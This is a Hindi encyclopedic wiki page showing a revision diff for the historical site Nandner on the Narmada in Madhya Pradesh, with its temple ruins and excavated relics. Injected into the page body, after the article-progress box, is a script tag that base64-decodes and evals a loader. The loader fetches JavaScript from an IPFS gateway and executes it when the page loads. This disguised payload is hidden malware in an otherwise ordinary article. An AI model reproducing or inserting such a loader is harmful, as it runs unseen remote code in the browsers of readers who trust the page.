Difference between revisions of "नांदनेर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''नादनेर''' होशंगाबाद ज़िला, मध्य प्रदेश का एक [[ऐति...' के साथ नया पन्ना बनाया)
 
 
Line 1: Line 1:
'''नादनेर''' [[होशंगाबाद ज़िला]], [[मध्य प्रदेश]] का एक [[ऐतिहासिक स्थान]] है। यह [[नर्मदा नदी]] के उत्तरी तट पर स्थित है।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=ऐतिहासिक स्थानावली|लेखक=विजयेन्द्र कुमार माथुर|अनुवादक= |आलोचक= |प्रकाशक=राजस्थान हिन्दी ग्रंथ अकादमी, जयपुर|संकलन= |संपादन= |पृष्ठ संख्या=483|url=}}</ref> यहाँ पर अनेक प्राचीन मंदिरों के खंडहर स्थित हैं, जो पुरातात्विक दृष्टि से बड़े ही महत्त्वपूर्ण हैं।
+
'''नादनेर''' [[होशंगाबाद ज़िला]], [[मध्य प्रदेश]] का एक [[ऐतिहासिक स्थान]] है। यह [[नर्मदा नदी]] के उत्तरी तट पर स्थित है।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=ऐतिहासिक स्थानावली|लेखक=विजयेन्द्र कुमार माथुर|अनुवादक= |आलोचक= |प्रकाशक=राजस्थान हिन्दी ग्रंथ अकादमी, जयपुर|संकलन= |संपादन= |पृष्ठ संख्या=483|url=}}</ref>
 +
 
 +
*नांदनेर में अनेक प्राचीन मंदिरों के खंडहर स्थित हैं, जो पुरातात्विक दृष्टि से बड़े ही महत्त्वपूर्ण हैं।
 +
*इस स्थान के उत्खननों से प्राप्त पुरावशेष '[[बिड़ला संग्रहालय (भोपाल)|बिड़ला संग्रहालय]]', [[भोपाल]] में संग्रहीत हैं।
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}

Latest revision as of 12:52, 11 July 2012

nadaner hoshangabad zila, madhy pradesh ka ek aitihasik sthan hai. yah narmada nadi ke uttari tat par sthit hai.[1]

  • naandaner mean anek prachin mandiroan ke khandahar sthit haian, jo puratatvik drishti se b de hi mahattvapoorn haian.
  • is sthan ke utkhananoan se prapt puravashesh 'bi dala sangrahalay', bhopal mean sangrahit haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. aitihasik sthanavali |lekhak: vijayendr kumar mathur |prakashak: rajasthan hindi granth akadami, jayapur |prishth sankhya: 483 |

sanbandhit lekh